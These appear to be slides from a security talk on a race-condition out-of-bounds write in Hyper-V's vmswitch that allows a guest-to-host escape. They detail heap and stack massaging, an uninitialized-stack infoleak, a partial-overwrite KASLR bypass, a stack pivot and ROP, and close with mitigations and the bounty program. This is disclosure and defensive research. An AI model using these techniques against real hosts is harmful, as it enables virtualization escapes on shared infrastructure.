  • 26. [Diagram: three race outcomes against GPADL 0/1. Too early: the RNDIS CMPLT lands before the buffer switch, in bounds of the old buffer. Too late: it lands after the sub-allocation bounds are updated (step 3), in bounds of GPADL 1. Just right: it lands in the window between steps 1 and 3, producing the out-of-bounds write.]
  • 27. Exploiting the vulnerability Controlling what’s written out-of-bounds Winning the race Finding a reliable corruption target?
  • 28. Finding a target: other GPADL/MDLs and… stacks 0: kd> !address ... ffffdd80`273bb000 ffffdd80`273c1000 0`00006000 SystemRange Stack Thread: ffffc903f188b080 ffffdd80`273c1000 ffffdd80`273c6000 0`00005000 SystemRange ffffdd80`273c6000 ffffdd80`273cc000 0`00006000 SystemRange Stack Thread: ffffc903eed10800 ffffdd80`273cc000 ffffdd80`273cf000 0`00003000 SystemRange ffffdd80`273cf000 ffffdd80`273d5000 0`00006000 SystemRange Stack Thread: ffffc903f182b080 ffffdd80`273d5000 ffffdd80`27606000 0`00231000 SystemRange ffffdd80`27606000 ffffdd80`2760c000 0`00006000 SystemRange Stack Thread: ffffc903f181f080 ffffdd80`2760c000 ffffdd80`2760d000 0`00001000 SystemRange ffffdd80`2760d000 ffffdd80`27613000 0`00006000 SystemRange Stack Thread: ffffc903ee878080 ffffdd80`27613000 ffffdd80`27625000 0`00012000 SystemRange ffffdd80`27625000 ffffdd80`2762b000 0`00006000 SystemRange Stack Thread: ffffc903ee981080 ffffdd80`2762b000 ffffdd80`2762c000 0`00001000 SystemRange ffffdd80`2762c000 ffffdd80`27632000 0`00006000 SystemRange Stack Thread: ffffc903f1bc64c0 ... 28
  • 29. Finding a target: kernel stacks • Windows kernel stacks • Fixed 7 page allocation size • 6 pages of stack space • 1 guard page at the bottom • Allocated in the SystemPTE region • Great corruption target if within range – gives instant ROP • Problems • How does the SystemPTE region allocator work? • Can we reliably place a stack at a known offset from our receive buffer? • Can we even “place” a stack? How do we spawn threads? 29
  • 30. Allocation bitmap • Bitmap based • Each bit represents a page • Bit 0 means free page, 1 means allocated • Uses a “hint” for allocation • Scans bitmap starting from hint • Wraps around bitmap if needed • Places hint at tail of successful allocations • Bitmap is expanded if no space is found SystemPTE allocator Free page Allocated page Bitmap hint 30
  • 31. SystemPTE allocator (bitmap animation frame). Example 1: allocating 5 pages.
  • 32. SystemPTE allocator (bitmap animation frame). Example 2: allocating 5 pages again.
  • 33. SystemPTE allocator (bitmap animation frame). Example 3: allocating 17 pages.
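The hint-based allocation behavior walked through on slides 30-33 can be sketched as a toy model. Sizes and names are illustrative, not NT's implementation; real NT expands the bitmap on failure, where this sketch just signals it:

```c
#include <assert.h>
#include <stdint.h>

#define NPAGES 16

/* Toy SystemPTE-style allocator: bit 0 = free page, 1 = allocated. Scanning
 * starts at the hint, wraps around once, and on success the hint is left at
 * the tail of the allocation. */
static uint8_t bitmap[NPAGES];
static int hint;

static int run_is_free(int start, int n) {
    for (int i = 0; i < n; i++)
        if (start + i >= NPAGES || bitmap[start + i])
            return 0;
    return 1;
}

static int alloc_pages(int n) {
    for (int pass = 0; pass < 2; pass++) {       /* pass 1 wraps to index 0 */
        int begin = (pass == 0) ? hint : 0;
        for (int s = begin; s + n <= NPAGES; s++) {
            if (run_is_free(s, n)) {
                for (int i = 0; i < n; i++)
                    bitmap[s + i] = 1;
                hint = s + n;                    /* hint at tail of alloc */
                return s;
            }
        }
    }
    return -1;                                   /* would trigger expansion */
}
```

The "hint at tail" rule is what makes consecutive allocations land back-to-back, which the massaging strategy later depends on.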
  • 34. SystemPTE massaging: allocation primitives • Receive/send buffers: can map any number of arbitrarily sized MDLs • (“arbitrary”: still have size/number limits, but they’re pretty high) • Some vmswitch messages use System Worker Threads • NT-maintained thread pool • More threads added to the pool when others are busy • Idea: trigger many async tasks quickly in a row • If enough are queued, more threads are spawned • Helper: deadlock bug in async task lets us lock existing worker threads • As a result: we can spray a handful of kernel stacks 34
  • 35. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks Two possible outcomes, both manageable SystemPTE massaging strategy Free page Allocated page Bitmap hint 35
  • 36-39. SystemPTE massaging strategy, Outcome #1 (bitmap animation frames repeating the steps above).
  • 40. SystemPTE massaging strategy, Outcome #1: final layout with the replaceable receive buffer adjacent to a sprayed thread stack (bitmap animation frame).
  • 41. Exploiting the vulnerability Controlling what’s written out-of-bounds Winning the race Finding a reliable corruption target Bypassing KASLR?
  • 43. nvsp_message struct • Represents messages sent to/from vmswitch over vmbus
    struct nvsp_message {
        struct nvsp_message_header hdr;
        union nvsp_all_messages msg;
    } __packed;
  • 44. [Diagram: two nvsp_message layouts. msg.send_ndis_ver (NVSP_MSG1_TYPE_SEND_NDIS_VER): UINT32 hdr.msg_type, UINT32 ndis_major_ver, UINT32 ndis_minor_ver. msg.send_rndis_pkt_complete (NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE): UINT32 hdr.msg_type, UINT32 status. In both cases sizeof(nvsp_message) bytes are transferred.]
  • 45. nvsp_message infoleak. [Diagram: reply layout: UINT32 hdr.msg_type, UINT32 status, then 32 uninitialized stack bytes.] nvsp_message is allocated on the stack; only the first 8 bytes are initialized, but sizeof(nvsp_message) bytes are returned, so 32 bytes of uninitialized stack memory are sent back to the guest. That can leak a vmswitch return address: we have enough to build a ROP chain and overwrite a kernel thread stack!
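The leak on this slide can be reconstructed as a sketch. The field sizes here are assumptions chosen to match the 8-initialized/32-leaked split on the slide, not the real vmswitch definitions, and the stale-stack contents are simulated with a fill pattern:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Assumed sizes: 4-byte header plus a 36-byte union gives sizeof == 40, so
 * 40 - 8 = 32 bytes go back to the guest without ever being written. */
struct nvsp_message_header { uint32_t msg_type; };
union nvsp_all_messages { uint8_t raw[36]; /* largest message body */ };
struct nvsp_message {
    struct nvsp_message_header hdr;
    union nvsp_all_messages msg;
} __attribute__((packed));

/* Host-side reply path (sketch): the struct is never fully initialized. */
static uint32_t build_reply(void *out) {
    struct nvsp_message m;
    memset(&m, 0xAA, sizeof(m));  /* stand-in for stale stack contents  */
    m.hdr.msg_type = 2;           /* reply type (value illustrative)    */
    memset(m.msg.raw, 0, 4);      /* status: only 8 bytes ever written  */
    memcpy(out, &m, sizeof(m));   /* whole struct copied back to guest  */
    return sizeof(m);
}
```

On a real stack, the 0xAA bytes are whatever earlier calls left behind, which is how a vmswitch return address ends up in the guest's hands.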
  • 46. Bypassing KASLR without an infoleak • Our infoleak applied to Windows Server 2012 R2, but not Windows 10 • Oops • How do we deal with KASLR without an infoleak? • KASLR only aligns most modules up to a 0x10000 byte boundary • As a result, partial overwrites are an option • Example: • Return address is: 0xfffff808e059f3be (RndisDevHostDeviceCompleteSetEx+0x10a) • Corrupt it to: 0xfffff808e04b8705 (ROP gadget: pop r15; ret;) • Can only do a single partial overwrite though… is that useful? • Only one partial overwrite because our OOB write is contiguous 46
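The alignment argument can be checked numerically. The addresses are the ones quoted on these slides; the helper name is made up:

```c
#include <assert.h>
#include <stdint.h>

/* Modules are KASLR-randomized only down to a 0x10000-byte boundary, so the
 * low 16 bits of any code address are fixed by the module's internal layout.
 * A 2-byte overwrite of a saved return address can therefore retarget it
 * within the same 0x10000 window without knowing the randomized base. */
static int same_kaslr_window(uint64_t a, uint64_t b) {
    return (a & ~0xFFFFull) == (b & ~0xFFFFull);
}
```

This is why the eventual exploit pivots to a gadget whose address differs from the leaked return address only in the low two bytes.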
  • 47. SystemPTE massaging. [Diagram: bitmap layout with the replaceable receive buffer, the target thread stack, and the send buffer immediately after the target stack.]
  • 48. Partial overwrite • What if we use it to get RSP into our send buffer? • Target return address: 0xFFFFF808E059F3BE • We corrupt it to: 0xFFFFF808E059DA32 • We end up doing RSP += 0xE78 • This moves RSP into our send buffer… which is shared with the guest. Gadget: lea r11, [rsp+0E50h]; mov rbx, [r11+38h]; mov rbp, [r11+40h]; mov rsp, r11; ...; ret. [Diagram: before/after stack dumps showing the corrupted return address near the top of the kernel thread stack and RSP relocated into the adjacent guest-shared buffer.]
  • 49. Host kernel stack in shared memory: what now? 1. The host CPU core throws a General Protection Fault (GPF) • No KASLR bypass means the RET instruction will necessarily cause a fault 2. The address where the GPF happened is dumped to the stack • In shared memory! We can read it, and that’s our KASLR bypass 3. Windows executes its GPF handler, still with the stack in shared memory 4. As attackers, we can: 1. Locate valid ROP gadget thanks to addresses being dumped to the stack 2. Manipulate the stack as the exception handler is being executed • Includes exception records and of course other return addresses 5. As a result, we get ROP execution in host ☺ 49
  • 52. Breaking the chain: 1. vulnerability discovery: targeted, continuous internal code review effort; 2. exploitation: break exploit techniques; 3. post-exploitation: make components less attractive targets, invest in detection.
  • 53. Hardening: kernel stack isolation To prevent overflowing into kernel stacks, we’ve moved them to their own region 0: kd> !address ... ffffae8f`050a8000 ffffae8f`050a9000 0`00001000 SystemRange ffffae8f`050a9000 ffffae8f`050b0000 0`00007000 SystemRange Stack Thread: ffffbc8934d51700 ffffae8f`050b0000 ffffae8f`050b1000 0`00001000 SystemRange ffffae8f`050b1000 ffffae8f`050b8000 0`00007000 SystemRange Stack Thread: ffffbc8934d55700 ffffae8f`050b8000 ffffae8f`050b9000 0`00001000 SystemRange ffffae8f`050b9000 ffffae8f`050c0000 0`00007000 SystemRange Stack Thread: ffffbc8934d59700 ffffae8f`050c0000 ffffae8f`050c1000 0`00001000 SystemRange ffffae8f`050c1000 ffffae8f`050c8000 0`00007000 SystemRange Stack Thread: ffffbc8934d5d700 ... 53
  • 54. Hardening: other kernel mitigations • Hypervisor-enforced Code Integrity (HVCI) • Attackers can’t inject arbitrary code into Host kernel • Kernel-mode Control Flow Guard (KCFG) • Attackers can’t achieve kernel ROP by hijacking function pointers • Work is being done to enable these features by default • Future hardware security features: CET • Hardware shadow stacks to protect return addresses and prevent ROP 54
  • 55. Hyper-V architecture: virtualization providers can be in user-mode. [Diagram: VSMB lives in VMWP.exe in host user mode; guest I/O reaches it over vmbus.]
  • 56. Hardening: VM Worker Process • Improved sandbox • Removed SeImpersonatePrivilege • Improved RCE mitigations • Enabled CFG export suppression • Large reduction in number of valid CFG targets • Enabled “Force CFG” • Only CFG-enabled modules can be loaded into VMWP • Several Hyper-V components being put in VMWP rather than kernel
  • 57. The Hyper-V bounty program • Up to $250,000 payout • Looking for code execution, infoleaks and denial-of-service issues • https://technet.microsoft.com/en-us/mt784431.aspx • Getting started • Joe Bialek and Nicolas Joly’s talk: “A Dive in to Hyper-V Architecture & Vulnerabilities” • Hyper-V Linux integration services • Open source, well-commented code available on GitHub • Good way to understand VSP interfaces and experiment! • Public symbols for some Hyper-V components
  • 58. Thank you for your time Special thanks to Matt Miller, David Weston, the Hyper-V team, the vmswitch team, the MSRC team and all my OSR buddies 58
  • 61. Hyper-V architecture: VMWP compromise. [Diagram: a malicious guest compromises VMWP.exe (e.g. through VSMB); the host is technically compromised, but the attacker is limited to VMWP user-mode.]
  • 62. Hyper-V architecture: VMWP to host kernel compromise. [Diagram: from VMWP user-mode, the attacker escapes through a local NT kernel or driver exploit.]
  • 63. Hyper-V architecture: VMWP to host kernel compromise. [Diagram: alternatively, the attacker goes for the host kernel directly through the VSP surface, e.g. storVSP over vmbus.]
  • 64. Hyper-V architecture: hypervisor compromise. [Diagram: the attacker compromises the hypervisor, either directly from the guest or through the host.]
  • 65. vmswitch initialization sequence over vmbus messages: NVSP_MSG_TYPE_INIT, NVSP_MSG1_TYPE_SEND_NDIS_VER, NVSP_MSG1_TYPE_SEND_RECV_BUF, NVSP_MSG1_TYPE_SEND_SEND_BUF, NVSP_MSG5_TYPE_SUBCHANNEL. [Diagram: each message establishes the corresponding shared structure in guest physical memory, mapped into host physical memory: the Receive Buffer, the Send Buffer, and the subchannel vmbus buffers 1-3.]
  • 66. vmswitch: how are RNDIS messages handled? [Diagram: same flow as slide 12, highlighting that the channel thread reads SEND_RNDIS_PKT messages from the vmbus channel as a batch before queueing the contained RNDIS messages for the worker threads.]
  • 67. vmswitch state machine. States: 0 None, 1 Initializing, 2 Operational, 3 Halted; transitions driven by NVSP_MSG_TYPE_INIT, RNDIS_INITIALIZE_MSG and RNDIS_HALT_MSG. [Table: which NVSP message types (NVSP_MSG_TYPE_INIT, NVSP_MSG1_TYPE_SEND_NDIS_VER, NVSP_MSG1_TYPE_SEND/REVOKE_RECV_BUF, NVSP_MSG1_TYPE_SEND/REVOKE_SEND_BUF, NVSP_MSG1_TYPE_SEND_RNDIS_PKT, NVSP_MSG5_TYPE_SUBCHANNEL) are accepted in each state.]
  • 68. vmswitch takeaways • Send/receive buffers are used to transfer many messages at a time • Opposite end needs to be prompted over vmbus to read from them • vmswitch relies on different threads for different tasks • vmbus dispatch threads • Setup send/receive buffers, subchannels… • Read RNDIS messages from send buffer • The system worker threads • Process RNDIS messages • Write responses to receive buffer • Subchannels only increase bandwidth in that they allow us to alert the opposite end more often 68
  • 69. vmswitch state machine (same state diagram and message table as slide 67).
  • 70. Winning the race: continuous writing? • Easy way to win the race: queue up RNDIS messages and keep having them write to the receive buffer continuously • Doesn’t work: RNDIS threads are blocked until an ack from the guest • Ack and buffer replacement happen on the same channel: can’t happen simultaneously… • …unless we use subchannels! • Multiple channels = simultaneity • …but we can’t, because of the state machine. [State machine table frame.]
  • 71. Winning the race: configuring the delay • We can delay the event by N time units, but what’s N’s value? • We have a limited number of tries: need to be smart • Can we distinguish between race attempt outcomes? • Yes • If we’re too early, increase N • If we’re too late, decrease N • If we’re just right… celebrate ☺ • In practice we usually converge to the right N in <10 attempts • N can vary from machine to machine and session to session 71
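The calibration loop on this slide can be sketched as a bisection. This is illustrative: `attempt()` stands in for one real race attempt against the host, whose outcome the slides say is distinguishable:

```c
#include <assert.h>

/* Each race attempt with delay n is distinguishable as too early (-1),
 * too late (+1), or a win (0), so the right N can be found by bisection. */
static int true_n = 37;   /* unknown to the "attacker"; varies per machine */

static int attempt(int n) {
    if (n < true_n) return -1;   /* too early  */
    if (n > true_n) return  1;   /* too late   */
    return 0;                    /* just right */
}

static int calibrate(int lo, int hi, int *tries) {
    *tries = 0;
    while (lo <= hi) {
        int n = lo + (hi - lo) / 2;
        (*tries)++;
        int r = attempt(n);
        if (r == 0) return n;
        if (r < 0) lo = n + 1;   /* too early: increase N */
        else       hi = n - 1;   /* too late: decrease N  */
    }
    return -1;
}
```

Bisection over a 1000-unit range needs at most ~10 probes, which matches the "<10 attempts" observation.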
  • 72. Finding a target: where’s our buffer? • GPADL mapping • GPADL PAs mapped into an MDL using VmbChannelMapGpadl • MDL then mapped to VA space using MmGetSystemAddressForMdlSafe • Where are MDLs mapped to? The SystemPTE region • What’s mapped adjacent to our MDL? • ...other MDLs 0: kd> !address @@c++(ReceiveBuffer) Usage: Base Address: ffffdd80`273d5000 End Address: ffffdd80`27606000 Region Size: 00000000`00231000 VA Type: SystemRange 72
  • 73. Finding a target: allocation primitives • Receive/send buffers: we can map an arbitrary number of arbitrarily sized MDLs • (“arbitrary”: still have size/number limits, but they’re pretty high) • Receive/send buffers: can be revoked • NVSP_MSG1_TYPE_REVOKE_RECV_BUF and NVSP_MSG1_TYPE_REVOKE_SEND_BUF • Since replacing buffers is a bug, we can only revoke the last one sent for each • We have pretty good allocation and freeing primitives for manipulating the region • But we need a way to allocate new stacks if we want to target them… • Can we spray host-side threads? 73
  • 74. Finding a target: stack allocation primitives • vmswitch relies on System Worker Threads to perform asynchronous tasks • NT-maintained thread pool • Additional threads are added to the pool when all others are busy • Basic idea: trigger an asynchronous task many times in rapid succession • If enough tasks are queued quickly enough, threads will be spawned • Several vmswitch messages rely on System Worker Threads • In this exploit we use NVSP_MSG2_TYPE_SEND_NDIS_CONFIG • Problem • This method usually lets us create about 5 threads • What if there are already a lot of threads in the system worker pool? • Would be nice to be able to terminate them… 74
  • 75. Finding a target: stack allocation primitives • There’s no by-design way to terminate worker threads from a guest • But there are bugs we can use! ☺ • NVSP_MSG1_TYPE_REVOKE_SEND/RECV_BUF • Revocation done on system worker threads • Deadlock bug: when multiple revocation messages handled, all but the last system worker thread would be deadlocked forever • We can use this to lock out an “arbitrary” number of system worker threads • We now have a limited thread stack spray! 75
  • 76-79. SystemPTE massaging strategy, Outcome #2 (bitmap animation frames repeating the steps above).
76–80. SystemPTE massaging strategy
1. Spray 1MB buffers
2. Allocate a 2MB − 1 page buffer
   • (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB − 7 pages buffer
5. Spray stacks
[Diagram: allocation bitmap animation showing free pages, allocated pages, the bitmap hint, the replaceable receive buffer, and thread stacks — outcome #2]
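The core of the massaging sequence can be modeled with a toy first-fit page bitmap that expands in 2MB (512-page) steps, like the SystemPTE region. This is a simplified sketch: the real allocator's bitmap hint, alignment, and the surrounding spray steps are not modeled.

```python
STEP = 512       # pages per 2MB SystemPTE expansion
MB_PAGES = 256   # pages per 1MB

class PageBitmap:
    def __init__(self):
        self.used = []  # one bool per page; False = free

    def alloc(self, npages):
        """First-fit scan; expand by STEP pages until a free run fits."""
        while True:
            run = 0
            for i, busy in enumerate(self.used):
                run = 0 if busy else run + 1
                if run == npages:
                    start = i - npages + 1
                    self.used[start:i + 1] = [True] * npages
                    return start
            self.used += [False] * STEP  # 2MB expansion

bm = PageBitmap()
big   = bm.alloc(STEP - 1)      # step 2: 2MB - 1 page, forces an expansion
mid   = bm.alloc(MB_PAGES)      # step 3: 1MB, forces a second expansion
small = bm.alloc(MB_PAGES - 7)  # step 4: 1MB - 7 pages
print(big, mid, small)
```

In this toy run the 2MB − 1 page buffer leaves a single free page at the end of the first expansion, so the 1MB buffer forces a second expansion and lands at a predictable page offset, with the 1MB − 7 pages buffer packed right behind it, which is what makes the stack spray in step 5 land at known distances.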
81. Finding a target: SystemPTE massaging
• After massaging, we know a stack is at one of two offsets from the receive buffer
  • Either 3MB − 6 pages away or 4MB − 6 pages away
• Since we can perform the race reliably, we can simply try both possible offsets
• Note: running the race requires revoking and re-mapping the receive buffer
  • We can do this because the SystemPTE bitmap will free our 2MB block and reuse it for the next 2MB block allocation
  • As a result, we're almost guaranteed to fall back into the same slot if we're fast enough
• We can overwrite a stack, but what do we write?
  • Overwriting return addresses requires a host KASLR bypass
  • Easiest way to get one: find an infoleak vulnerability
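For reference, the two candidate offsets named above work out to the following byte values (assuming 4KB pages):

```python
PAGE = 0x1000
MB = 0x100000

# The two possible distances from the receive buffer to the sprayed stack.
offsets = [3 * MB - 6 * PAGE, 4 * MB - 6 * PAGE]
print([hex(o) for o in offsets])  # ['0x2fa000', '0x3fa000']
```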
82. Putting it all together
• We can leak 32 bytes of host stack memory
• We can leak a vmswitch return address
• With a return address we can build a ROP chain ☺
• Final exploit:
  1. Use the infoleak to locate vmswitch
  2. Use that information to build a ROP chain
     • We don't know for sure which stack we're corrupting, so we prepend a ROP NOP-sled
     • (that just means a series of pointers to a RET instruction, one after another)
  3. Perform host SystemPTE massaging
  4. Use the race condition to overwrite a host kernel thread stack with the ROP chain
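The ROP NOP-sled idea can be sketched as follows; the module base and gadget offsets below are placeholder values for illustration — in the real exploit the base comes from the infoleak and the offsets from the actual vmswitch binary.

```python
import struct

# Assumed values, for illustration only.
VMSWITCH_BASE = 0xFFFFF80012340000      # hypothetical leaked module base
RET_GADGET    = VMSWITCH_BASE + 0x1051  # hypothetical lone `ret` instruction

def build_payload(chain, sled_slots=64):
    """Prepend a 'ROP NOP-sled' -- the RET gadget's address repeated -- so
    that whichever return slot on the corrupted stack we actually hit,
    execution slides down into the real chain."""
    sled = struct.pack('<Q', RET_GADGET) * sled_slots
    return sled + b''.join(struct.pack('<Q', g) for g in chain)

payload = build_payload([VMSWITCH_BASE + 0x2000, 0x4141414141414141])
print(len(payload))  # 64 * 8 sled bytes + 2 * 8 chain bytes = 528
```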
83. What about security? Host OS mitigations
Host OS kernel:
• Full KASLR
• Kernel Control Flow Guard (optional)
• Hypervisor-enforced code integrity (HVCI) (optional)
• No sandbox
VM Worker Process:
• ASLR
• Control Flow Guard (CFG)
• Arbitrary Code Guard (ACG)
• Code Integrity Guard (CIG)
• Win32k lockdown